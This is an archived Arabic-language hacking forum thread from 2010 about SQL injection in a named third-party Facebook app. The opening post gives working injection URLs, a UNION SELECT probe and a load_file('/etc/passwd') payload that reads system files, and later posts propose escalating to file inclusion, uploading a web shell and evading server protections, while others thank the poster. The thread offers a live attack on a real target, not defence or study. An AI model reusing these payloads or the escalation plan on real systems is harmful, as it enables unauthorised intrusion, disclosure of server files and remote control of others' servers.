:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   ~ facebook sql Injection xD ~ (http://www.vbspiders.com/vb/t35666.html)

Dr.NaNo 08-26-2010 09:09 AM
~ facebook sql Injection xD ~
 

:biggrin:


كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 

:biggrin: /etc/passwd



كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 
لازم نطورهــــــآأ هع :biggrin:







بالتوفيــــــٌق

kanvi 08-26-2010 01:40 PM
تفضل اخي و قمت بشرح عملية الحقن

اختـــــــــــراق سرفـــــــــير app.facebook

X HuNter 08-26-2010 02:12 PM
cool

Dr.NaNo 08-26-2010 03:22 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة kanvi (المشاركة 203504)
تفضل اخي و قمت بشرح عملية الحقن

اختـــــــــــراق سرفـــــــــير app.facebook

اهلين اخي نورت الموضوع ..


بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات

لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d


وانا جبت الروابط عشان نطورها فقط لا غير ..


والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:

كود PHP:
   http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 

لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر

ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين



بالتوفيــق

Dr.NaNo 08-26-2010 03:23 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة X HuNter (المشاركة 203515)
cool

شكرأ ..



اللهـم إني صايـم .


بالتوفيق

kanvi 08-27-2010 01:02 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Dr.NaNo (المشاركة 203538)
اهلين اخي نورت الموضوع ..


بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات

لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d


وانا جبت الروابط عشان نطورها فقط لا غير ..


والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:

كود PHP:
   http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 
لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر

ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين



بالتوفيــق
بارك الله فيك اخي العزيز

نعم الثغرة مشروحة في مواقع السكريتي وهي ثغرة في تطبيقات app.facebook
وليست ثغرة facebook

يعني اذا رفعة الشل ستجده في موقع اخر وليس على
الفيس بوك

في انتظر التطوير الثغرةفلسطين
في امان الله

shapola 10-01-2010 10:01 PM
شكراااا يا رجالة ...... و احلى تقيم ليكم :) .....


الساعة الآن 12:18 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0